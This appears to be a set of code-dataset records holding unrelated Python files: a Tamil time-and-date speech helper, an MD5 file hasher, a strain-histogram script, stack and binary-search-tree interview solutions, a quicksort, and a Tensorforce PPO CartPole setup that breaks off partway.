'repeat'\n\ndef mapTextTamil(data):\n\ttxts = TXTtamil()\n\ttxts = [txts for txts in dir(txts) if not txts.startswith('__')]\n\tvar1 = TXTtamil()\n\tfor txt in txts:\n\t\t#print(var1.__getitem__(txt))\n\t\tif(data in var1.__getitem__(txt)):\n\t\t\treturn str(txt)\n\treturn 'repeat'\n\n\nclass pre:\n\t@staticmethod #called as pre.time(); without staticmethod this fails as an unbound method call\n\tdef time():\n\t\tspeak(getattr(TAMIL,'time'),'ta')\n\t\tspeak(getattr(TAMIL,'_'+ time.strftime(\"%H\")),'ta')\n\t\tspeak(getattr(TAMIL,'hour'),'ta')\n\t\tspeak(getattr(TAMIL,'_'+ time.strftime(\"%M\")),'ta')\n\t\tspeak(getattr(TAMIL,'minute'),'ta')\n\n\t@staticmethod\n\tdef date():\n\t\tspeak(getattr(TAMIL,'today'),'ta')\n\t\tspeak(getattr(TAMIL,'twothousand'),'ta')\n\t\tspeak(getattr(TAMIL,'_'+ time.strftime(\"%Y\").strip('20')),'ta')\n\t\tspeak(getattr(TAMIL,'aam'),'ta')\n\t\tspeak(getattr(TAMIL,'year'),'ta')\n\t\tspeak(getattr(TAMIL,time.strftime(\"%B\").lower()),'ta')\n\t\tspeak(getattr(TAMIL,'month'),'ta')\n\t\tspeak(getattr(TAMIL,'_'+str(int(time.strftime(\"%d\")))),'ta')\n\t\tspeak(getattr(TAMIL,'aam'),'ta')\n\t\tspeak(getattr(TAMIL,'day'),'ta')\n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
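# A compact sketch of the chunked-MD5 pattern that the next file implements
# in one shot; reading in fixed-size blocks keeps memory flat for large
# files. Only hashlib.md5 from the standard library is used; the function
# name and block size are illustrative.
import hashlib

def md5_of_file_sketch(path, block_size=65536):
    digest = hashlib.md5()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(block_size), b''):
            digest.update(block)
    return digest.hexdigest()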
+{"seq_id":"126744004","text":"# importing our hashing helper (only md5 is used)\nfrom hashlib import md5\n\nwhile True:\n    # asking for user input regarding which file we want to hash\n    file_to_hash = raw_input(\n        \"Enter the name of the file you wish to hash [Type 'exit' to exit]...\\n\")\n\n    # If the user types 'exit', stop\n    if file_to_hash == 'exit':\n        break\n\n    # opening our target file in binary format\n    with open('suspicious_files/' + file_to_hash, 'rb') as afile:\n        # read the selected file\n        buf = afile.read()\n\n    # assigning the hash value to a new variable\n    hash = md5(buf).hexdigest()\n\n    # printing out the resulting hash value to the screen\n    print(hash + \"\\n\" + \"Done!\")\n","sub_path":"hash_machine.py","file_name":"hash_machine.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312690040","text":"# Averaging spatially resolved strain in reconstructed \n# objects of nominally zero strain to determine approximate \n# strain resolution of BCDI measurement.\n\nimport numpy as np\nimport scipy.io as sio\nimport matplotlib.pyplot as plt  # required by the plt.hist call below; this import was missing\n\nfrom argparse import Namespace\nfrom scipy.ndimage.morphology import binary_erosion\n\n\ndata = Namespace( \n    **sio.loadmat( \n        '/home/smaddali/ANL/Manuscripts/HEBCDI/data/estimatedStrains_correctScale.mat' \n    ) \n)\n\n##########################################################\n\nrho = data.rho_stdSample\nstrain = data.strain_stdSample\nlabel = r'Au nanoparticle'\nnumErosions = 3\n\n#rho = data.rho_111_A\n#strain = data.strain_111_A\n#label = r'Grain $111$' \n#numErosions = 5\n\n#rho = data.rho_111_B\n#strain = data.strain_111_B\n#label = r'Grain $\\bar{1}\\bar{1}\\bar{1}$'\n#numErosions = 5\n\nhistbins = 50\n\n##########################################################\n\nsup = ( np.absolute( rho ) > 0. ).astype( float )\nfor n in range( numErosions ):\n    sup = binary_erosion( sup )\n\nstraindata = strain[ np.where( sup > 0.5 ) ]\n\n\n#plt.clf()\nplt.hist( \n    straindata, \n    bins=np.linspace( straindata.min(), straindata.max(), histbins ), \n    histtype='step', \n    linewidth=2, \n    label=label\n)\n\n","sub_path":"Python/strainResolution.py","file_name":"strainResolution.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"601912505","text":"import collections\nimport sys\nimport string\n\"\"\"\n1. Expression evaluation\na. Infix Notation: Operators are written between the operands they operate on, e.g. 3 + 4, including\nbrackets\n\nb. Postfix (Reverse Polish) notation: Operators are written after their operands.\n\n
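As a warm-up for (b), a minimal postfix evaluator sketch using the standard
operator module instead of eval(); tokens are space separated as in qn1b
below, and the first pop is always the right-hand operand. 'rpn_sketch' is
an illustrative name, not one of this file's solutions:

    import operator
    OPS = {'+': operator.add, '-': operator.sub,
           '*': operator.mul, '/': operator.truediv}

    def rpn_sketch(expr):
        stack = []
        for tok in expr.split():
            if tok in OPS:
                right, left = stack.pop(), stack.pop()
                stack.append(OPS[tok](left, right))
            else:
                stack.append(float(tok))
        return stack.pop()

    # rpn_sketch("3 4 +") == 7.0 and rpn_sketch("8 2 -") == 6.0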
c. Given a reverse polish expression, create a tree\n\n   An expression tree is a binary tree in which each internal node corresponds to an operator and each leaf node \n   corresponds to an operand\n\"\"\"\n\ndef qn1a(input):\n\tarr = input.split(\" \")\n\toperand_stack = []\n\toperator_stack = []\n\toperators = [\"+\", \"-\", \"/\", \"*\"]\n\tprecedence = {\"+\": 1, \"-\": 1, \"*\": 2, \"/\": 2}\n\n\tdef apply_top():\n\t\t#the first pop is the RIGHT operand; evaluating left + op + right keeps \"-\" and \"/\" correct\n\t\t#(the original evaluated first_operand + op + second_operand, which reversed the operand order)\n\t\tright = operand_stack.pop()\n\t\tleft = operand_stack.pop()\n\t\toperator = operator_stack.pop()\n\t\toperand_stack.append(str(eval(left + operator + right)))\n\n\ti = 0\n\twhile i < len(arr):\n\t\tc = arr[i]\n\t\tif c not in operators and c not in [\"(\", \")\"]:\n\t\t\toperand_stack.append(c)\n\t\telif c == \"(\":\n\t\t\toperator_stack.append(c)\n\t\telif c in operators:\n\t\t\t#collapse pending operators of equal or higher precedence first, so left-associative chains like 8 - 2 - 1 evaluate left to right\n\t\t\twhile len(operator_stack) > 0 and operator_stack[-1] in operators and precedence[operator_stack[-1]] >= precedence[c]:\n\t\t\t\tapply_top()\n\t\t\toperator_stack.append(c)\n\t\telif c == \")\":\n\t\t\twhile operator_stack[-1] != \"(\":\n\t\t\t\tapply_top()\n\t\t\toperator_stack.pop()\n\t\ti += 1\n\n\twhile len(operand_stack) > 1:\n\t\tapply_top()\n\n\treturn operand_stack[-1]\n\"\"\"\n    Test Cases: \n    \"10 + 2 * 6\" ---> 22 \n    \"100 * 2 + 12\" ---> 212 \n    \"100 * ( 2 + 12 )\" ---> 1400 \n    \"100 * ( 2 + 12 ) / 14\" ---> 100 \n\"\"\"\n#print(qn1a(\"10 + 2 * 6\"))\n#print(qn1a(\"100 * 2 + 12\"))\n#print(qn1a(\"100 * ( 2 + 12 )\"))\n#print(qn1a(\"100 * ( 2 + 12 ) / 14\"))\n\ndef qn1b(s):\n\n\tmy_stack = []\n\tsplit_ = s.split(\" \")\n\toperators = [\"+\", \"-\", \"/\", \"*\"]\n\n\tfor i in range(len(split_)):\n\t\tif split_[i] not in operators:\n\t\t\tmy_stack.append(split_[i])\n\t\telse:\n\t\t\t#in postfix the first pop is the right-hand operand; the original swapped these and computed \"4 - 3\" for \"3 4 -\"\n\t\t\tright = my_stack.pop()\n\t\t\tleft = my_stack.pop()\n\t\t\teval_ = eval(left + \" \" + split_[i] + \" \" + right)\n\t\t\tmy_stack.append(str(eval_))\n\n\treturn my_stack.pop()\n\"\"\"\n2. \na. input: [] [[]] [][][] ][, ]], [[[ ]]]\n \nwrite a function to return T/F given the input is a valid (syntactically correct) bracket order\n\nb. Given a compressed string in which a number followed by [] indicates how many times those characters occur, \ndecompress the string.\nEg.: a3[b2[c1[d]]]e will be decompressed as a bcdcd bcdcd bcdcd e.\nAssume the string is well formed and a number will always be followed by a [].\n\"\"\"\ndef qn2(input):\n\tif len(input) == 0:\n\t\traise ValueError(\"length must be more than zero\")\n\n\tif len(input) % 2 == 1:\n\t\treturn False\n\tstack_ = collections.deque()\n\n\tfor i in range(len(input)):\n\t\tif input[i] == \"[\":\n\t\t\tstack_.append(\"[\")\n\t\telif input[i] == \"]\":\n\t\t\t#only \"[\" is ever pushed, so an empty stack means an unmatched \"]\"; otherwise pop the match\n\t\t\tif len(stack_) == 0:\n\t\t\t\treturn False\n\t\t\tstack_.pop()\n\t\telse:\n\t\t\traise ValueError(\"only allow [ or ]\")\n\n\treturn len(stack_) == 0\n\n
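# Illustrative checks for qn2, using the bracket strings listed in its
# docstring above (a sketch; qn2 raises ValueError on empty input or on
# characters other than square brackets):
assert qn2("[]") and qn2("[[]]") and qn2("[][][]")
assert not qn2("][") and not qn2("]]") and not qn2("[[[")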
\"\"\"\n3. Design a stack that allows popping the min in O(1):\n\n    a. O(1) time and O(n) extra space => keep a second stack that mirrors the running minimum\n    b. Design a stack that supports getMin() in O(1) time and O(1) extra space\n\n\"\"\"\nclass Qn3Stacka:\n\tdef __init__(self):\n\t\tself.min_stack = []\n\t\tself.stack = []\n\n\tdef push(self, value):\n\t\tself.stack.append(value)\n\t\tif len(self.min_stack) == 0:\n\t\t\tself.min_stack.append(value)\n\t\telse:\n\t\t\t#the original referenced the bare name min_stack here, which raised a NameError\n\t\t\tself.min_stack.append(min(value, self.min_stack[-1]))\n\n\tdef pop(self):\n\t\t#pop takes no value argument; it removes and returns the top element\n\t\tself.min_stack.pop()\n\t\treturn self.stack.pop()\n\n\tdef get_min(self):\n\t\treturn self.min_stack[-1]\n\nclass Qn3Stackb:\n\t#O(1) extra space: when a new minimum v arrives, push the encoded value 2*v - min instead;\n\t#the encoded entry is always smaller than v, which is how pop() recognises it\n\tdef __init__(self):\n\t\tself.min = None\n\t\tself.stack = []\n\n\tdef push(self, value):\n\t\tif len(self.stack) == 0:\n\t\t\tself.stack.append(value)\n\t\t\tself.min = value\n\t\telif value >= self.min:\n\t\t\tself.stack.append(value)\n\t\telse:\n\t\t\tself.stack.append(2 * value - self.min)\n\t\t\tself.min = value\n\n\tdef pop(self):\n\t\ty = self.stack.pop()\n\t\tif y < self.min:\n\t\t\t#encoded entry: the true value is the current min, and the previous min is recovered\n\t\t\t#from the encoding before y is overwritten (the original overwrote y first, so the\n\t\t\t#restored minimum never changed)\n\t\t\ttrue_value = self.min\n\t\t\tself.min = 2 * self.min - y\n\t\t\treturn true_value\n\t\treturn y\n\n\tdef get_min(self):\n\t\treturn self.min\n\n\n\"\"\"\n4. Implement a queue using 2 stacks\n\"\"\"\n\nclass MyQueue:\n\tdef __init__(self):\n\t\t#plain lists stand in for the stack.Stack helper the original referenced but never defined\n\t\tself.pop_stack = []\n\t\tself.push_stack = []\n\n\tdef push(self, value):\n\t\tself.push_stack.append(value)\n\n\tdef _shift(self):\n\t\t#transfer only when the pop side runs dry, so each element moves at most once (amortized O(1));\n\t\t#the original shuttled every element on every push and pop\n\t\tif not self.pop_stack:\n\t\t\twhile self.push_stack:\n\t\t\t\tself.pop_stack.append(self.push_stack.pop())\n\n\tdef pop(self):\n\t\tself._shift()\n\t\treturn self.pop_stack.pop()\n\n\tdef peek(self):\n\t\tself._shift()\n\t\treturn self.pop_stack[-1]\n\n\tdef isEmpty(self):\n\t\treturn not self.push_stack and not self.pop_stack\n\n
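# A quick usage check for the two-stack queue above (illustrative only):
# FIFO order must hold across interleaved push/pop calls.
q = MyQueue()
for v in (1, 2, 3):
	q.push(v)
assert q.pop() == 1 and q.peek() == 2
q.push(4)
assert [q.pop() for _ in range(3)] == [2, 3, 4] and q.isEmpty()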
\"\"\"\n7. BST with no parent pointer\n\na. Implement an iterator over a binary search tree (BST). \nYour iterator will be initialized with the root node of a BST.\n\nThe first call to next() will return the smallest number in the BST. \nCalling next() again will return the next smallest number in the BST, and so on.\n\nNote: next() and hasNext() should run in average O(1) time and use O(h) memory, where h is the height of the tree.\nTry to optimize the additional space complexity apart from the amortized time complexity. \n\nsimilar: Find if there is a triplet in a Balanced BST that adds to zero => similar to a\n\n\nb. Given a binary search tree T, where each node contains a positive integer, and an integer K, \nyou have to find whether or not there exist two different nodes A and B such that A.value + B.value = K.\nReturn 1 to denote that two such nodes exist. Return 0, otherwise.\nNotes\nYour solution should run in linear time and not take memory more than O(height of T).\nAssume all values in the BST are distinct.\nno parent pointer\n\nInput 1: \n\nT :   10\n     /  \\\n    9    20\n\nK = 19\nReturn: 1\nInput 2: \n\nT:   10\n    /  \\\n   9    20\nK = 40\nReturn: 0\n\nc. check if 2 BSTs are similar in O(n) time and O(h) space. Similar means the nodes are the same but the structure differs\n\n\nd. Kth Smallest Element In Tree\nGiven a binary search tree, write a function to find the kth smallest element in the tree.\n\nInput : \n  2\n / \\\n1   3\n\nand k = 2\n\nReturn : 2\n\nAs 2 is the second smallest element in the tree.\nYou may assume 1 <= k <= Total number of nodes in BST \n\ne. we have a list of trees (roots are given), check whether all of them are similar.\n   Whether two trees are similar depends on the leaves from left to right.\n\ne.g. \n    1 \n  2   3\n 4   5 6\n\nIf we print leaves from left to right we will get 4, 5, 6\n\n    1\n  2   6 \n    3 \n   4 5\n\nIf we print leaves from left to right we will get 4, 5, 6\n\nTherefore, the two trees above are similar.\n\"\"\"\n\nclass Node:\n\tdef __init__(self, x):\n\t\tself.value = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass qn7a:\n\t# @param root, a binary search tree's root node\n\tdef __init__(self, root):\n\t\tself.stack = []\n\t\tself.root = root\n\t\tself.populate_min()\n\n\t# @return a boolean, whether we have a next smallest number\n\tdef hasNext(self):\n\t\treturn self.stack != []\n\n\t# @return an integer, the next smallest number\n\tdef next(self):\n\t\tif self.hasNext():\n\t\t\tnode_to_return = self.stack.pop()\n\n\t\t\tif node_to_return.right != None:\n\t\t\t\tnext_stack_element = node_to_return.right\n\t\t\t\twhile next_stack_element != None:\n\t\t\t\t\tself.stack.append(next_stack_element)\n\t\t\t\t\tnext_stack_element = next_stack_element.left\n\n\t\t\treturn node_to_return.value #return the value itself to match the integer contract above\n\n\t\treturn -1\n\n\tdef populate_min(self):\n\t\tcurrent = self.root\n\t\twhile current != None:\n\t\t\tself.stack.append(current)\n\t\t\tcurrent = current.left\n\n\ndef qn7b(root, k):\n\tmin_stack = []\n\tmax_stack = []\n\n\t#both iterators must start from the root; the original started the ascending one at root.left,\n\t#so pairs involving the root on the small side (e.g. root=10, right=20, K=30) were missed\n\telement_of_min_stack = root\n\twhile element_of_min_stack != None:\n\t\tmin_stack.append(element_of_min_stack)\n\t\telement_of_min_stack = element_of_min_stack.left\n\n\telement_of_max_stack = root\n\twhile element_of_max_stack != None:\n\t\tmax_stack.append(element_of_max_stack)\n\t\telement_of_max_stack = element_of_max_stack.right\n\n\t#stop once the two iterators meet, so a node is never paired with itself\n\twhile len(min_stack) > 0 and len(max_stack) > 0 and min_stack[-1].value < max_stack[-1].value:\n\t\tif min_stack[-1].value + max_stack[-1].value == k:\n\t\t\treturn True\n\n\t\telif min_stack[-1].value + max_stack[-1].value < k:\n\t\t\t#advance the ascending iterator\n\t\t\tcurrent = min_stack.pop()\n\t\t\telement_to_add = current.right\n\t\t\twhile element_to_add != None:\n\t\t\t\tmin_stack.append(element_to_add)\n\t\t\t\telement_to_add = element_to_add.left\n\n\t\telse:\n\t\t\tcurrent = max_stack.pop()\n\t\t\telement_to_add = current.left\n\t\t\twhile element_to_add != None:\n\t\t\t\tmax_stack.append(element_to_add)\n\t\t\t\telement_to_add = element_to_add.right\n\n\treturn False\n\n\ndef qn7c(root1, root2):\n\tstack1 = []\n\tstack2 = []\n\n\twhile root1 != None:\n\t\tstack1.append(root1)\n\t\troot1 = root1.left\n\n\twhile root2 != None:\n\t\tstack2.append(root2)\n\t\troot2 = root2.left\n\n\twhile len(stack1) > 0 and len(stack2) > 0:\n\t\tif stack1[-1].value != stack2[-1].value:\n\t\t\treturn False\n\n\t\tcurrent1 = stack1.pop()\n\t\tnext1 = current1.right\n\t\twhile next1 != None:\n\t\t\tstack1.append(next1)\n\t\t\tnext1 = next1.left\n\n\t\tcurrent2 = stack2.pop()\n\t\tnext2 = current2.right\n\t\twhile next2 != None:\n\t\t\tstack2.append(next2)\n\t\t\tnext2 = next2.left\n\n\treturn len(stack1) == 0 and len(stack2) == 0\n\ndef qn7d_stack(root, k):\n\tcurrent = root\n\tstack = []\n\twhile current != None:\n\t\tstack.append(current)\n\t\tcurrent = current.left\n\n\twhile len(stack) > 0 and k > 0:\n\t\tcurrent = stack.pop()\n\t\tk -= 1\n\t\tif current.right != None:\n\t\t\tnext_node = current.right\n\t\t\twhile next_node != None:\n\t\t\t\tstack.append(next_node)\n\t\t\t\tnext_node = next_node.left\n\n\treturn current.value\n\n
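# Illustrative check for qn7d_stack on the docstring's example tree
# (a sketch only; it reuses Node and qn7d_stack defined above):
#     2
#    / \
#   1   3      k = 2 should give 2
_root = Node(2)
_root.left, _root.right = Node(1), Node(3)
assert qn7d_stack(_root, 1) == 1
assert qn7d_stack(_root, 2) == 2
assert qn7d_stack(_root, 3) == 3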
def qn7d_morris(root, k):\n\tcurrent = root\n\n\twhile k > 0 and current != None:\n\t\tif current.left == None:\n\t\t\tk -= 1\n\t\t\tif k == 0:\n\t\t\t\tbreak #stop before stepping past the kth node\n\t\t\tcurrent = current.right\n\t\telse:\n\t\t\t#the inorder predecessor is the rightmost node of the LEFT subtree (the original searched current.right)\n\t\t\tpre = current.left\n\t\t\twhile pre.right != None and pre.right != current:\n\t\t\t\tpre = pre.right\n\n\t\t\tif pre.right == None:\n\t\t\t\tpre.right = current #thread the predecessor back to current (assignment, not the comparison the original wrote)\n\t\t\t\tcurrent = current.left\n\n\t\t\telse:\n\t\t\t\tpre.right = None #remove the thread\n\t\t\t\tk -= 1\n\t\t\t\tif k == 0:\n\t\t\t\t\tbreak\n\t\t\t\tcurrent = current.right\n\n\treturn current.value\n\n\n\n\n\n\"\"\"\n8.\nIn a party of N people, only one person is known to everyone (celebrity). That celebrity doesn’t know anyone in the party. Find the celebrity if such a person exists.\n\nInput Format\nThe first line of the input will contain N (the number of people) and K. Each of the next K lines will contain 2 space separated integers i and j stating that person i knows person j.\n\nOutput Format\nThe person who is a celebrity.\n\nSample Input\n\n4 \n\n1 3\n2 3\n4 3\n2 1\n1 4\n\nCelebrity is 3 \n\n=> this solution uses a stack but it is also possible to use 2 pointers\n\"\"\"\n#relationship = [(1,3),(2,3), ...]\ndef qn8(n, relationship):\n\tstorage = [[0] * n for i in range(n)]\n\n\tfor (i, j) in relationship: #use i/j here; the original reused m/n and shadowed the number of people\n\t\tstorage[i-1][j-1] = 1\n\n\tstack = list(range(n))\n\n\twhile len(stack) > 1:\n\t\tfirst = stack.pop()\n\t\tsecond = stack.pop()\n\t\tif storage[first][second] == 1:\n\t\t\tstack.append(second) #first knows second, so first is definitely not the celebrity\n\t\telse:\n\t\t\tstack.append(first) #first does not know second, so second is not the celebrity\n\n\treturn stack[-1] + 1\n\nn = 4\nrelationship = [(1,3),(2,3), (4,3), (2,1), (1,4)]\n#print(qn8(n, relationship))\n\n\n\"\"\"\n9. Write a program to sort a stack so that the smallest items end up on top. You may use at most one additional\nstack to hold items, but you may not copy the elements into any other data structure (such as an array).\nThe stack supports the following operations: push, pop, peek, and isEmpty.\n\"\"\"\n\ndef qn9(input_stack):\n\t#assumes a Stack class offering push/pop/peek/isEmpty (not defined in this file)\n\ttemp_stack = Stack()\n\ttemp_stack.push(input_stack.pop())\n\n\twhile input_stack.isEmpty() == False:\n\t\tif input_stack.peek() >= temp_stack.peek():\n\t\t\ttemp_stack.push(input_stack.pop())\n\t\telse:\n\t\t\ttemp = input_stack.pop()\n\t\t\twhile temp_stack.isEmpty() == False and temp < temp_stack.peek(): #peek is a method call; the original compared against the unbound method temp_stack.peek\n\t\t\t\tinput_stack.push(temp_stack.pop())\n\t\t\ttemp_stack.push(temp)\n\n\twhile temp_stack.isEmpty() == False:\n\t\tinput_stack.push(temp_stack.pop())\n\n\treturn input_stack\n\n
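# The two-pointer variant mentioned at the end of qn8's docstring, as a
# sketch over the same 0/1 'storage' matrix (storage[i][j] == 1 means person
# i knows person j); the function name is illustrative, not part of the
# original file.
def celebrity_two_pointer_sketch(storage):
	num_people = len(storage)
	a, b = 0, num_people - 1
	while a < b:
		if storage[a][b]: #a knows b, so a cannot be the celebrity
			a += 1
		else:             #a does not know b, so b cannot be the celebrity
			b -= 1
	#verify the surviving candidate against everyone else
	for i in range(num_people):
		if i != a and (storage[a][i] or not storage[i][a]):
			return -1
	return a + 1 #1-indexed, matching qn8's return convention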
\"\"\"\n10.\n\na. Next Greater Element: Given an array of integers, replace every number with the next higher number to its right.\nIf a number can't be replaced, we leave it as it is. For example, 5, 2, 1, 4, 6, 7 \nneeds to be changed to 6, 4, 4, 6, 7, 7.\n\n\nb. Largest Rectangular Area in a Histogram: \nFind the largest rectangular area possible in a given histogram where the largest rectangle \ncan be made of a number of contiguous bars. For simplicity, assume that all bars have the same \nwidth and the width is 1 unit.\n\n\nc. Sliding Window Maximum\nGiven an array nums, there is a sliding window of size k which is moving from the very left of\nthe array to the very right. You can only see the k numbers in the window. \nEach time the sliding window moves right by one position. Return the max sliding window.\n\nExample:\n\nInput: nums = [1,3,-1,-3,5,3,6,7], and k = 3\nOutput: [3,3,5,5,6,7] \nExplanation: \n\nWindow position                Max\n---------------               -----\n[1  3  -1] -3  5  3  6  7       3\n 1 [3  -1  -3] 5  3  6  7       3\n 1  3 [-1  -3  5] 3  6  7       5\n 1  3  -1 [-3  5  3] 6  7       5\n 1  3  -1  -3 [5  3  6] 7       6\n 1  3  -1  -3  5 [3  6  7]      7\nNote: \nYou may assume k is always valid, 1 ≤ k ≤ input array's size for non-empty array.\n\nFollow up:\nCould you solve it in linear time?\n\"\"\"\n\ndef qn10a(arr):\n\tstack = []\n\n\tfor i in range(len(arr)):\n\t\tif len(stack) == 0 or arr[i] <= arr[stack[-1]]:\n\t\t\tstack.append(i)\n\t\telse:\n\t\t\twhile len(stack) > 0 and arr[i] > arr[stack[-1]]:\n\t\t\t\tcurrent_top_of_stack_index = stack.pop()\n\t\t\t\tarr[current_top_of_stack_index] = arr[i]\n\t\t\tstack.append(i)\n\treturn arr\n\n#print(qn10a([5, 2, 1, 4, 6, 7]))\n\n\ndef qn10b(arr):\n\tstack = []\n\tout = 0\n\tfor i in range(len(arr)):\n\t\tif len(stack) == 0 or arr[i] >= arr[stack[-1]]: \n\t\t\tstack.append(i)\n\t\telse:\n\t\t\t#keep popping while the top bar is taller than the current one\n\t\t\twhile len(stack) > 0 and arr[i] < arr[stack[-1]]:\n\t\t\t\tcurrent_index = stack.pop()\n\t\t\t\tlength = i if len(stack) == 0 else i - stack[-1] - 1 #the rectangle extends back to the previous (shorter) bar left on the stack\n\n\t\t\t\tcurrent_area = arr[current_index] * length\n\t\t\t\tout = max(out, current_area)\n\t\t\tstack.append(i)\n\n\tlast_index = len(arr)\n\twhile len(stack) > 0: \n\t\tcurrent_index = stack.pop()\n\t\tlength = last_index if len(stack) == 0 else last_index - stack[-1] - 1\n\t\tcurrent_area = arr[current_index] * length\n\t\tout = max(out, current_area)\n\treturn out\n\n#print(qn10b([6, 2, 5, 4, 5, 1, 6]))\n#print(qn10b([1,2,5,6,3]))\n\n\ndef qn10c(arr, k):\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tdouble_queue = collections.deque()\n\tfor i in range(k):\n\t\twhile len(double_queue) > 0 and arr[double_queue[-1]] < arr[i]:\n\t\t\tdouble_queue.pop()\n\n\t\tdouble_queue.append(i)\n\n\tres = []\n\tfor i in range(k, len(arr)):\n\t\tres.append(arr[double_queue[0]])\n\n\t\twhile len(double_queue) > 0 and arr[double_queue[-1]] < arr[i]:\n\t\t\tdouble_queue.pop()\n\n\t\tdouble_queue.append(i)\n\n\t\twhile i - double_queue[0] >= k:\n\t\t\tdouble_queue.popleft()\n\n\tres.append(arr[double_queue[0]])\n\treturn res\n\narr = [1,3,-1,-3,5,3,6,7]\nk = 3\nprint(qn10c(arr, k)) #the original called the undefined name qn16 here\n\narr = [5,0,1,4]\nk = 3\nprint(qn10c(arr, k))\n\n\n\"\"\"\n11. Given an encoded string, return its decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. 
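(An aside: the same decoding can also be written recursively; the stack-based
qn11 below is this file's solution, while this sketch consumes the string
with an explicit index instead -- 'decode_sketch' is an illustrative name:)

    def decode_sketch(s, i=0):
        out, num = "", 0
        while i < len(s):
            c = s[i]
            if c.isdigit():
                num = num * 10 + int(c)
            elif c == "[":
                inner, i = decode_sketch(s, i + 1)
                out += num * inner
                num = 0
            elif c == "]":
                return out, i
            else:
                out += c
            i += 1
        return out, i

    # decode_sketch("3[a2[c]]")[0] == "accaccacc"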
For example, there won't be input like 3a or 2[4].\n\nExamples:\n\ns = \"3[a]2[bc]\", return \"aaabcbc\".\ns = \"3[a2[c]]\", return \"accaccacc\".\ns = \"2[abc]3[cd]ef\", return \"abcabccdcdcdef\".\n\"\"\"\n\ndef qn11(str):\n\tstack = []\n\tres = \"\"\n\tfor c in str:\n\t\tif len(stack) == 0 or c != \"]\":\n\t\t\tstack.append(c)\n\t\telse:\n\t\t\tcur = \"\"\n\t\t\twhile stack[-1] != \"[\":\n\t\t\t\tcur = stack.pop() + cur\n\t\t\t#pop \"[\"\n\t\t\tstack.pop()\n\t\t\tcounter = \"\"\n\t\t\twhile len(stack) >0 and stack[-1] in string.digits:\n\t\t\t\tcounter = stack.pop() + counter\n\t\t\tcur = cur * int(counter)\n\t\t\tstack.append(cur)\n\tfor c in stack:\n\t\tres += c\n\treturn res\ns = \"3[a]2[bc]\"\nprint(qn11(s))\n\ns = \"3[a2[c]]\"\nprint(qn11(s))\n\ns = \"2[abc]3[cd]ef\"\nprint(qn11(s))\ns = \"100[a]\"\nprint(qn11(s))","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":16371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"422530185","text":"#!/usr/bin/env python3\n# encoding: utf-8\n# Public Domain\n\n\ndef quick_sort(t):\n\tif len(t) < 2:\n\t\treturn t\n\t\n\t# copy the list (don't modify it)\n\tt = t[:]\n\t\n\t# pick the middle element as the pivot\n\tpivot = t.pop((len(t) - 1)//2)\n\t\n\tleft = list(filter(lambda x: x < pivot, t))\n\tright = list(filter(lambda x: x >= pivot, t))\n\t\n\treturn quick_sort(left) + [pivot] + quick_sort(right)\n\n\nif __name__ == '__main__':\n\timport random\n\tnums = [random.randrange(100) for _ in range(20)]\n\t\n\tprint(quick_sort(nums))","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278048501","text":"from tensorforce import Agent, Environment\r\nfrom tensorforce.agents import PPOAgent\r\nfrom tensorforce.environments import OpenAIGym\r\n\r\n# Pre-defined or custom environment\r\n# environment = Environment.create(\r\n# environment='gym', level='CartPole', max_episode_timesteps=500\r\n# )\r\n\r\n# Network as list of layers\r\nnetwork_spec = [\r\n dict(type='dense', size=32, activation='tanh'),\r\n dict(type='dense', size=32, activation='tanh')\r\n]\r\n\r\nenvironment = OpenAIGym('CartPole-v0', visualize=True, max_episode_steps=500)\r\n\r\n\r\n# Instantiate a Tensorforce agent\r\n# agent = Agent.create(\r\n# agent='tensorforce',\r\n# environment=environment, # alternatively: states, actions, (max_episode_timesteps)\r\n# memory=10000,\r\n# update=dict(unit='timesteps', batch_size=64),\r\n# optimizer=dict(type='adam', learning_rate=3e-4),\r\n# policy=dict(network='auto'),\r\n# objective='policy_gradient',\r\n# reward_estimation=dict(horizon=20)\r\n# )\r\n\r\nagent = Agent.create(\r\n agent='ppo', environment=environment, batch_size=10, learning_rate=1e-3\r\n)\r\n\r\n# agent = PPOAgent(\r\n# states_spec=environment.states,\r\n# actions_spec=environment.actions,\r\n# network_spec=network_spec,\r\n# batch_size=4096,\r\n# # BatchAgent\r\n# keep_last_timestep=True,\r\n# # PPOAgent\r\n# step_optimizer=dict(\r\n# type='adam',\r\n# learning_rate=1e-3\r\n# ),\r\n# optimization_steps=10,\r\n# # Model\r\n# scope='ppo',\r\n# discount=0.99,\r\n# # DistributionModel\r\n# distributions_spec=None,\r\n# entropy_regularization=0.01,\r\n# # PGModel\r\n# baseline_mode=None,\r\n# baseline=None,\r\n# baseline_optimizer=None,\r\n# gae_lambda=None,\r\n# # PGLRModel\r\n# likelihood_ratio_clipping=0.2,\r\n# # summary_spec=None,\r\n# # 
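# A small helper sketching the act/observe episode loop that follows, using
# only the Tensorforce calls already present in this script (reset, act,
# execute, observe); the function name run_episode_sketch is illustrative.
def run_episode_sketch(agent, environment):
    states = environment.reset()
    terminal = False
    total_reward = 0.0
    while not terminal:
        actions = agent.act(states=states)
        states, terminal, reward = environment.execute(actions=actions)
        agent.observe(terminal=terminal, reward=reward)
        total_reward += reward
    return total_reward
# 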
